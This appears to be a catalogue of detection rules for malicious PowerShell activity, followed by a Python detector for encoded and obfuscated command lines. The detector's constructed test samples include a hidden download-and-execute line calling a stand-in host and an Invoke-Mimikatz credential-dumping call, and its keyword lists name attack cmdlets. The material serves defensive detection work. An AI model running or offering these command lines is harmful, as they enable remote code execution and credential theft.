  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Clip - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Remote PowerShell Session (PS Module) - Level: high
    Description: Detects remote PowerShell sessions
  • Suspicious PowerShell Download - PoshModule - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious PowerShell Invocations - Generic - PowerShell Module - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Suspicious PowerShell Invocations - Specific - PowerShell Module - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • PowerShell ADRecon Execution - Level: high
    Description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IB report
  • PowerShell Create Local User - Level: medium
    Description: Detects creation of a local user via PowerShell
  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock - Level: high
    Description: Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
  • Import PowerShell Modules From Suspicious Directories - Level: medium
    Description: Detects powershell scripts that import modules from suspicious directories
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
  • Invoke-Obfuscation STDIN+ Launcher - Powershell - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Powershell - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Powershell - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Keywords - Level: medium
    Description: Detects keywords from well-known PowerShell exploitation frameworks
  • Powershell MsXml COM Object - Level: medium
    Description: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
  • Malicious Nishang PowerShell Commandlets - Level: high
    Description: Detects Commandlet names and arguments from the Nishang exploitation framework
  • NTFS Alternate Data Stream - Level: high
    Description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
  • PowerShell Web Access Installation - PsScript - Level: high
    Description: Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse
  • PowerView PowerShell Cmdlets - ScriptBlock - Level: high
    Description: Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.
  • PowerShell Credential Prompt - Level: high
    Description: Detects PowerShell calling a credential prompt
  • PSAsyncShell - Asynchronous TCP Reverse Shell - Level: high
    Description: Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell
  • PowerShell PSAttack - Level: high
    Description: Detects the use of PSAttack PowerShell hack tool
  • PowerShell Remote Session Creation - Level: medium
    Description: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
  • Change PowerShell Policies to an Insecure Level - PowerShell - Level: medium
    Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.
  • PowerShell ShellCode - Level: high
    Description: Detects Base64 encoded Shellcode
  • Malicious ShellIntel PowerShell Commandlets - Level: high
    Description: Detects Commandlet names from ShellIntel exploitation scripts.
  • Potential PowerShell Obfuscation Using Character Join - Level: low
    Description: Detects specific techniques often seen used inside of PowerShell scripts to obfuscate alias creation
  • Suspicious PowerShell Download - Powershell Script - Level: medium
    Description: Detects suspicious PowerShell download command
  • Suspicious PowerShell Invocations - Generic - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Suspicious PowerShell Invocations - Specific - Level: high
    Description: Detects suspicious PowerShell invocation command parameters
  • Potential Suspicious PowerShell Keywords - Level: medium
    Description: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
  • Potential PowerShell Obfuscation Using Alias Cmdlets - Level: low
    Description: Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts
  • Usage Of Web Request Commands And Cmdlets - ScriptBlock - Level: medium
    Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
  • Potential WinAPI Calls Via PowerShell Scripts - Level: high
    Description: Detects use of WinAPI functions in PowerShell scripts
  • WMImplant Hack Tool - Level: high
    Description: Detects parameters used by WMImplant
  • Powershell XML Execute Command - Level: medium
    Description: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • Command Line Execution with Suspicious URL and AppData Strings - Level: medium
    Description: Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell)
  • Suspicious File Execution From Internet Hosted WebDav Share - Level: high
    Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
  • Cmd.EXE Missing Space Characters Execution Anomaly - Level: high
    Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe. This could be a sign of obfuscation or of a fat finger problem (a typo by the developer).
  • Powershell Executed From Headless ConHost Process - Level: medium
    Description: Detects the use of PowerShell commands from a headless ConHost window. The "--headless" flag hides the window from the user upon execution.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • HackTool - Covenant PowerShell Launcher - Level: high
    Description: Detects suspicious command lines used in Covenant launchers
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - CrackMapExec PowerShell Obfuscation - Level: high
    Description: The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
  • HackTool - Empire PowerShell Launch Parameters - Level: high
    Description: Detects suspicious powershell command line parameters used in Empire
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Execute Code with Pester.bat as Parent - Level: medium
    Description: Detects code execution via Pester.bat (Pester - PowerShell module for testing)
  • Execute Code with Pester.bat - Level: medium
    Description: Detects code execution via Pester.bat (Pester - PowerShell module for testing)
  • Detection of PowerShell Execution via Sqlps.exe - Level: medium
    Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • SQL Client Tools PowerShell Session Detection - Level: medium
    Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • Suspicious Encoded PowerShell Command Line - Level: high
    Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
  • Suspicious PowerShell Encoded Command Patterns - Level: high
    Description: Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains
  • PowerShell Base64 Encoded FromBase64String Cmdlet - Level: high
    Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
  • Malicious Base64 Encoded PowerShell Keywords in Command Lines - Level: high
    Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
  • PowerShell Base64 Encoded IEX Cmdlet - Level: high
    Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
  • PowerShell Base64 Encoded Invoke Keyword - Level: high
    Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
  • PowerShell Base64 Encoded Reflective Assembly Load - Level: high
    Description: Detects base64 encoded .NET reflective loading of Assembly
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call - Level: high
    Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
  • PowerShell Base64 Encoded WMI Classes - Level: high
    Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
  • Potential PowerShell Obfuscation Via Reversed Commands - Level: high
    Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine - Level: medium
    Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate suspicious activity
  • Potential PowerShell Command Line Obfuscation - Level: high
    Description: Detects the PowerShell command lines with special characters
  • Potential PowerShell Downgrade Attack - Level: medium
    Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
  • PowerShell Web Download - Level: medium
    Description: Detects suspicious ways to download files or content using PowerShell
  • Obfuscated PowerShell OneLiner Execution - Level: high
    Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
  • Potential DLL File Download Via PowerShell Invoke-WebRequest - Level: medium
    Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
  • PowerShell Download Pattern - Level: medium
    Description: Detects a Powershell process that contains download commands in its command line string
  • DSInternals Suspicious PowerShell Cmdlets - Level: high
    Description: Detects execution and usage of the DSInternals PowerShell module, which can be used to perform activity that might be considered suspicious, such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
  • Suspicious Execution of Powershell with Base64 - Level: medium
    Description: Detects a command line that launches PowerShell with a base64 payload
  • Potential Encoded PowerShell Patterns In CommandLine - Level: low
    Description: Detects specific combinations of encoding methods in PowerShell via the commandline
  • Powershell Inline Execution From A File - Level: medium
    Description: Detects inline execution of PowerShell code from a file
  • Certificate Exported Via PowerShell - Level: medium
    Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
  • Base64 Encoded PowerShell Command Detected - Level: high
    Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
  • Suspicious PowerShell IEX Execution Patterns - Level: high
    Description: Detects suspicious ways to run Invoke-Expression using the IEX alias
  • Import PowerShell Modules From Suspicious Directories - ProcCreation - Level: medium
    Description: Detects powershell scripts that import modules from suspicious directories
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Non Interactive PowerShell Process Spawned - Level: low
    Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
  • Potential PowerShell Obfuscation Via WCHAR - Level: high
    Description: Detects suspicious encoded character syntax often used for defense evasion
  • Execution of Powershell Script in Public Folder - Level: high
    Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
  • Potential Powershell ReverseShell Connection - Level: high
    Description: Detects usage of the "TcpClient" class, which can be abused to establish remote connections and reverse shells, as seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and others.
  • Suspicious PowerShell Invocation From Script Engines - Level: medium
    Description: Detects suspicious powershell invocations from interpreters or unusual programs
  • Change PowerShell Policies to an Insecure Level - Level: medium
    Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
  • Exchange PowerShell Snap-Ins Usage - Level: high
    Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
  • Suspicious PowerShell Download and Execute Pattern - Level: high
    Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
  • Suspicious PowerShell Parameter Substring - Level: high
    Description: Detects suspicious PowerShell invocation with a parameter substring
  • Suspicious PowerShell Parent Process - Level: high
    Description: Detects a suspicious or uncommon parent process of PowerShell
  • PowerShell Script Run in AppData - Level: medium
    Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
  • PowerShell DownloadFile - Level: high
    Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
  • Net WebClient Casing Anomalies - Level: high
    Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
  • Suspicious XOR Encoded PowerShell Command - Level: medium
    Description: Detects presence of a potentially xor encoded powershell command
  • Suspicious Schtasks Execution AppData Folder - Level: high
    Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
  • Potential Persistence Via Powershell Search Order Hijacking - Task - Level: high
    Description: Detects suspicious PowerShell execution via a scheduled task where the command ends with suspicious flags to hide the PowerShell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as seen being used in Colibri Loader
  • Scheduled Task Executing Payload from Registry - Level: medium
    Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
  • Scheduled Task Executing Encoded Payload from Registry - Level: high
    Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
  • Potential Data Exfiltration Activity Via CommandLine Tools - Level: high
    Description: Detects the use of various CLI utilities exfiltrating data via web requests
  • Hidden Powershell in Link File Pattern - Level: medium
    Description: Detects events that appear when a user click on a link file with a powershell command in it
  • Windows Shell/Scripting Processes Spawning Suspicious Programs - Level: high
    Description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
  • Usage Of Web Request Commands And Cmdlets - Level: medium
    Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
  • Potentially Suspicious WebDAV LNK Execution - Level: medium
    Description: Detects possible execution via LNK file accessed on a WebDAV server.
  • Remote PowerShell Session Host Process (WinRM) - Level: medium
    Description: Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (a sign of an active PowerShell remoting session).
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell - Level: medium
    Description: Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry - Level: high
    Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • TropicTrooper Campaign November 2018 - Level: high
    Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Potential Emotet Activity - Level: high
    Description: Detects all Emotet like process executions that are not covered by the more generic rules
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Suspicious PrinterPorts Creation (CVE-2020-1048) - Level: high
    Description: Detects new commands that add new printer port which point to suspicious file
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • UNC2452 Process Creation Patterns - Level: high
    Description: Detects specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • UNC2452 PowerShell Pattern - Level: critical
    Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
  • CVE-2022-24527 Microsoft Connected Cache LPE - Level: high
    Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
  • Potential Bumblebee Remote Thread Creation - Level: high
    Description: Detects remote thread injection events based on behaviour seen used by Bumblebee
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
  • Raspberry Robin Subsequent Execution of Commands - Level: high
    Description: Detects subsequent command execution by the Raspberry Robin malware.
  • Raspberry Robin Initial Execution From External Drive - Level: high
    Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
  • FakeUpdates/SocGholish Activity - Level: high
    Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
  • MERCURY APT Activity - Level: high
    Description: Detects suspicious command line patterns seen being used by MERCURY APT
  • Rorschach Ransomware Execution Activity - Level: critical
    Description: Detects Rorschach ransomware execution activity
  • Potential APT FIN7 POWERHOLD Execution - Level: high
    Description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
  • Potential POWERTRASH Script Execution - Level: high
    Description: Detects potential execution of the PowerShell script POWERTRASH
  • Lace Tempest PowerShell Evidence Eraser - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
  • Lace Tempest PowerShell Launcher - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
  • Potential APT FIN7 Exploitation Activity - Level: medium
    Description: Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
  • Remote Thread Creation Via PowerShell - Level: medium
    Description: Detects the creation of a remote thread from a Powershell process to another process
  • Network Connection Initiated By PowerShell Process - Level: low
    Description: Detects a network connection that was initiated from a PowerShell process. Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies.
  • Uncommon PowerShell Hosts - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic - Level: low
    Description: Detects PowerShell execution that makes use of the bxor (bitwise XOR) operator. Attackers might use it as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious.
  • WinAPI Library Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • WinAPI Function Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • Headless Process Launched Via Conhost.EXE - Level: medium
    Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the windows from the user upon execution.
  • Unusually Long PowerShell CommandLine - Level: low
    Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Potentially Suspicious PowerShell Child Processes - Level: medium
    Description: Detects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
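The encoded-command rules in the list above (base64-encoded IEX, Invoke-, FromBase64String and WMI class names, the -EncodedCommand payload, reversed commands, Net.WebClient casing anomalies and the 1000-character threshold) all reduce to string matching over process command lines. The Python below is an added example written for this report; it is not code from the Sigma project and does not reproduce any rule's exact strings. The keyword list, the base64 blob regex, the loose -EncodedCommand pattern, the set of "normal" Net.WebClient casings and the sample command lines are all assumptions constructed here.

```python
"""Added example, not part of the SigmaTACT report or of any Sigma rule.
A small detector for PowerShell command-line patterns: base64-encoded keywords
matched at all three base64 alignments (UTF-8 and UTF-16LE), decoding of the
-EncodedCommand payload, reversed-string and Net.WebClient casing checks, and
the 1000-character length threshold. All sample command lines are constructed."""
import base64
import re

# Keywords to hunt for inside base64 blobs (assumption: a small subset of what
# the listed rules use). Base64 is case-sensitive, so each casing of a keyword
# (IEX / iex / Iex) needs its own fragment set; only one casing is shown here.
KEYWORDS = ["IEX", "Invoke-", "FromBase64String", "DownloadString", "Win32_ShadowCopy"]


def base64_offsets(keyword: str, encoding: str) -> list:
    """Return the three base64 fragments that encode `keyword` at each possible
    byte alignment (0, 1 or 2 bytes into a 3-byte base64 group). Leading chars
    that mix in the unknown preceding bytes and trailing chars that mix in the
    unknown following bytes are trimmed so the fragment is alignment-exact."""
    raw = keyword.encode(encoding)
    start = (0, 2, 3)        # chars contaminated by `i` unknown prefix bytes
    end = (None, -3, -2)     # chars contaminated by the unknown suffix byte(s)
    frags = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + raw).decode()
        frags.append(enc[start[i]:end[(len(raw) + i) % 3]])
    return frags


FRAGMENTS = {kw: base64_offsets(kw, "utf-8") + base64_offsets(kw, "utf-16le")
             for kw in KEYWORDS}

BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...);
# this loose pattern is a hunting heuristic, not the exact parser behaviour.
ENCODED_CMD = re.compile(r"(?i)\s-e[a-z]{0,14}\s+([A-Za-z0-9+/]{20,}={0,2})")
WEBCLIENT = re.compile(r"net\.webclient", re.IGNORECASE)
NORMAL_CASINGS = {"Net.WebClient", "net.webclient", "NET.WEBCLIENT"}  # assumption
REVERSED = [kw[::-1].lower() for kw in
            ("Invoke-Expression", "DownloadString", "FromBase64String", "New-Object")]


def encode_command(script: str) -> str:
    """What an attacker passes to -EncodedCommand: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16le")).decode()


def analyze(cmdline: str) -> dict:
    """Return the findings for one process command line."""
    f = {"encoded_keywords": [], "decoded": None, "reversed": False,
         "webclient_casing": False, "long": len(cmdline) >= 1000}
    for blob in BASE64_BLOB.findall(cmdline):
        for kw, frags in FRAGMENTS.items():
            if kw not in f["encoded_keywords"] and any(x in blob for x in frags):
                f["encoded_keywords"].append(kw)
    m = ENCODED_CMD.search(cmdline)
    if m:
        try:
            f["decoded"] = base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            pass  # not a real -EncodedCommand blob; plaintext checks still run
    text = cmdline + " " + (f["decoded"] or "")
    f["reversed"] = any(r in text.lower() for r in REVERSED)
    f["webclient_casing"] = any(hit not in NORMAL_CASINGS for hit in WEBCLIENT.findall(text))
    return f


def is_suspicious(cmdline: str) -> bool:
    f = analyze(cmdline)
    return bool(f["encoded_keywords"] or f["reversed"] or f["webclient_casing"] or f["long"])


def alignment_coverage(keyword: str, encoding: str, script: str) -> list:
    """Self-check: encode `script` shifted by 0, 1 and 2 bytes and report whether
    the fragments for `keyword` hit in each case (a naive single base64 of the
    keyword would only hit one of the three)."""
    frags = base64_offsets(keyword, encoding)
    return [any(x in base64.b64encode(b"x" * pad + script.encode(encoding)).decode()
                for x in frags) for pad in range(3)]


# Constructed sample command lines (not taken from any real incident).
SAMPLES = [
    "powershell.exe -nop -w hidden -enc " + encode_command(
        "IEX (New-Object nEt.WEbCliEnT).DownloadString('http://example.invalid/a')"),
    "powershell -c \"iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(b" Invoke-Mimikatz -DumpCreds").decode() + "')))\"",
    "powershell -c \"$s='noisserpxE-ekovnI';& (-join $s[-1..-($s.Length)]) 'whoami'\"",
    "powershell.exe -NoProfile -File C:\\Scripts\\Backup.ps1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_suspicious(s), analyze(s)["encoded_keywords"], s[:60])
```

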